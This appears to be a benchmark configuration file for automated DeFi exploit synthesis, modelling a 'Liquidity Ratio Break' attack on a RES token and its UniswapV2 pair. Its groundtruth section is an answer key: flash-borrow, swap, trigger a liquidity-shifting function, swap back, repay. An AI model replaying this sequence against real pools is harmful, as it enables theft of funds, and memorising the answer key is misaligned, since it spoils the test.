# Information for benchmarks building.
project_name: "RES"

ctrt_name2cls:
  - ["usdt", "USDT"]
  - ["resA", "RESA"]
  - ["resB", "RESB"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["usdt", ""]
  - ["resA", "new RESA(totalSupplyresA)"]
  - ["resB", "new RESB(totalSupplyresB)"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function addliquidity_resA_pair_resA_usdt() internal eurus {
    resA.thisAToB();
    pair.sync();
    }"

extra_deployments:
  - "resA.afterDeploy(address(pair), address(router), address(usdt));"
  - "resA.transfer(address(resA), 1000000e8);"

extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "resA", "owner", "1000000e8"]
  - ["swap", "pair", "attacker", "resA", "usdt", "resA.balanceOf(attacker)", "pair.getAmountOut(resA.balanceOf(attacker), address(resA))"]
  - ["addliquidity", "resA", "pair", "resA", "usdt"]
  - ["swap", "pair", "attacker", "usdt", "resA", "90000e18", "pair.getAmountOut(90000e18, address(usdt))"]
  - ["payback", "resA", "owner", "1000000e8 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "resA":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_defientry: true
    hacked_oracles: ["pair"]
  "resB":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["usdt", "resA"]
    support_swaps:
      "usdt": ["usdt", "resA"]
      "resA": ["usdt", "resA"]
    is_oracle: true
    oracle: "pair"

pattern: "Liquidity Ratio Break"
